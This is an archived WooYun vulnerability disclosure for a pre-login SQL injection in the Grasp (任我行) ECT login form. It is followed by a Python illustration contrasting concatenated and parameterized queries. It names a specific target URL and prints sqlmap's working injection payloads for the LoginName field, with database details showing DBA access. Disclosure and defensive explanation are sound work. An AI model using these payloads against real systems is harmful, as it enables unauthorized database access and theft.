Vulnerability summary

Defect ID: wooyun-2015-0105065

Title: SQL injection in Grasp (任我行) ECT (no login required)

Vendor: grasp.com.cn

Author: 路人甲

Submitted: 2015-04-01 10:57

Fix time: 2015-07-05 10:59

Published: 2015-07-05 10:59

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2015-04-01: Details sent to the vendor; awaiting vendor handling
2015-04-06: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-05-31: Details opened to core white hats and relevant domain experts
2015-06-10: Details opened to regular white hats
2015-06-20: Details opened to intern white hats
2015-07-05: Details disclosed to the public

Brief description:

As stated in the title.

Detailed description:

Grasp (任我行) ECT (an enterprise "people and task management" execution control tool)
The login form has a POST injection, running with DBA privileges.
Affected installations:


Injection endpoint (login handler): http://crm.netzone.com/VerifyUser.asp

Proof of vulnerability:

(Four screenshots in the original report; sqlmap output follows.)

sqlmap identified the following injection points with a total of 45 HTTP(s) requests:
---
Parameter: LoginName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
current database: 'grasp_crm'
current user is DBA: True
Database: grasp_crm
[290 tables]

Suggested fix:

Filtering.
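As an added illustration (not code from the report or from the vendor), the query pattern behind the boolean-based blind finding that sqlmap reports above, beside the parameterized form that removes it. SQLite stands in for the SQL Server backend named in the report, and the table and column names are assumptions, not the vendor's schema; the false-condition variant of sqlmap's LoginName value is constructed for the comparison.

```python
import sqlite3

# Constructed stand-in for the application's user table. SQLite replaces the
# SQL Server 2008 backend named in the report, and the table and column names
# (CRM_LoginUser, LoginName, Password) are assumptions, not the vendor schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CRM_LoginUser (LoginName TEXT, Password TEXT)")
    conn.execute("INSERT INTO CRM_LoginUser VALUES ('admin', 's3cret')")
    return conn

def lookup_concat(conn, login_name):
    """Vulnerable pattern: the POST field is spliced into the SQL text, so
    anything after a quote is parsed as SQL rather than as a user name."""
    sql = "SELECT COUNT(*) FROM CRM_LoginUser WHERE LoginName = '%s'" % login_name
    return conn.execute(sql).fetchone()[0]

def lookup_param(conn, login_name):
    """Hardened pattern: a bound parameter keeps the whole field as data."""
    sql = "SELECT COUNT(*) FROM CRM_LoginUser WHERE LoginName = ?"
    return conn.execute(sql, (login_name,)).fetchone()[0]

# The LoginName value from the sqlmap output, and a constructed variant that
# differs only in making the injected condition false. If the two produce
# different results, the application exposes a boolean oracle, which is what
# sqlmap's "boolean-based blind" finding means.
TRUE_CASE = "admin' AND 6853=6853 AND 'XQMw'='XQMw"
FALSE_CASE = "admin' AND 6853=6854 AND 'XQMw'='XQMw"

def has_boolean_oracle(lookup):
    """Return True when the lookup distinguishes the true and false cases."""
    conn = make_db()
    return lookup(conn, TRUE_CASE) != lookup(conn, FALSE_CASE)

if __name__ == "__main__":
    print("concatenated query exposes oracle:", has_boolean_oracle(lookup_concat))
    print("parameterized query exposes oracle:", has_boolean_oracle(lookup_param))
```

With the concatenated query the two values return 1 and 0 rows; with the bound parameter both return 0, since no user is literally named that string, and a plain "admin" still matches.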

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2015-07-05 10:59

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None